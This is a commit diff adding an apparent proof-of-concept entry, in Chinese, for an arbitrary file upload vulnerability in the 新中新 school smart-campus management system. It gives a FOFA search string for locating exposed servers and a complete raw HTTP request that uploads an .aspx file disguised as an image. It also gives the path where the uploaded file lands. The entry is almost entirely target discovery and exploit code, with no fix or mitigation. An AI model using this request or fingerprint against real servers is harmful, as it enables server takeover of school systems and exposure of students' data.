整理文件
This commit is contained in:
36
新中新中小学智慧校园信息管理系统/新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞.md
Normal file
36
新中新中小学智慧校园信息管理系统/新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞.md
Normal file
@@ -0,0 +1,36 @@
|
||||
## 新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞
|
||||
|
||||
新中新中小学智慧校园信息管理系统PSE存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
|
||||
|
||||
## fofa
|
||||
|
||||
```yaml
|
||||
body="/Login/IndexMobi"
|
||||
```
|
||||
|
||||

|
||||
|
||||
## poc
|
||||
|
||||
```yaml
|
||||
POST /PSE/Upload HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
|
||||
Content-Type: multipart/form-data; boundary=00content0boundary00
|
||||
Host:
|
||||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
||||
Content-Length: 149
|
||||
Connection: close
|
||||
|
||||
--00content0boundary00
|
||||
Content-Disposition: form-data; name="file"; filename="test.aspx"
|
||||
Content-Type: image/jpg
|
||||
|
||||
123
|
||||
--00content0boundary00--
|
||||
```
|
||||
|
||||

|
||||
|
||||
文件路径
|
||||
|
||||
`/Upload/PrimarySchoolEnrollment/70895ada-146e-4c52-a377-af0fb7b05d57.aspx`
|
||||
Reference in New Issue
Block a user